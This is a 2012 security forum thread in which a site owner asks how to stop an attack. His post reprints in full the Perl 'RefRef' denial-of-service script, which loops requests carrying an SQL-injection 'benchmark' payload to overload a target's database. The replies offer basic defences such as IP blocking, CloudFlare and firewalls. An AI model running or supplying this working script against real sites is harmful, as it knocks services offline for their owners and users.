1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

They use this script to Ddos attack me - How can i stop them?

Discussion in 'Security' started by ASTRAPI, Mar 6, 2012.

0
  1. #1
    Hello

    A user is using this perl script to attack me?

    
use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);


head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();


sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}


sub adios {
print "\n[+] Stoping attack\n";
copyright();
}


sub head {
print "\n\n-- == #RefRef == --\n\n";
}


sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}


sub sintax {
print "\n[+] Sintax : $0 \n";
}


sub toma {
return $nave->get($_[0]);
}


# ¿ The End ?
    Code (markup):
    Any ideas how to stop this?

    It is attacking to url like:

    
http://www.xxx.xxx/xxx.php?xxx=xxx
    Code (markup):
    I am using cloudflare and nginx on my server plus csf firewall...

    Thank you
     
    ASTRAPI, Mar 6, 2012 IP
  2. PISG

    PISG Member

    Messages:
    16
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    31
    #2
    Just block IP :)
     
    PISG, Mar 8, 2012 IP
  3. KJMS-Chris

    KJMS-Chris Guest

    Messages:
    33
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Cloudflare should handle it OK
     
    KJMS-Chris, Mar 14, 2012 IP
  4. damoncloudflare

    damoncloudflare Greenhorn

    Messages:
    78
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    16
    #4
    Blocking the IP in your CloudFlare threat control panel should help (some other quick tips for dealing with a DDoS attack). Since you're using nginx as your server, however, you would want to make sure that you do this for CloudFlare and nginx.
     
    damoncloudflare, Mar 21, 2012 IP
  5. azmoum

    azmoum Member

    Messages:
    59
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    46
    #5
    azmoum, Mar 26, 2012 IP
  6. tiffanywilliams12i2

    tiffanywilliams12i2 Peon

    Messages:
    164
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    hardware firewalls do much better job
     
    tiffanywilliams12i2, Apr 6, 2012 IP
  7. Commoner

    Commoner Banned

    Messages:
    208
    Likes Received:
    17
    Best Answers:
    0
    Trophy Points:
    78
    #7
    The question is why he will DDoS your site(s)? Instead, block off all I.Ps or temporary put server down to maintenance mode. If you're generating big bucks with this website, it's advisable to invest in hardware firewalls and use it as a medium - more troublesome but worth it..

    Steer clear of services offering anti-DDoS attacks.

    All The Best,
    Commoner
     
    Commoner, Jul 18, 2015 IP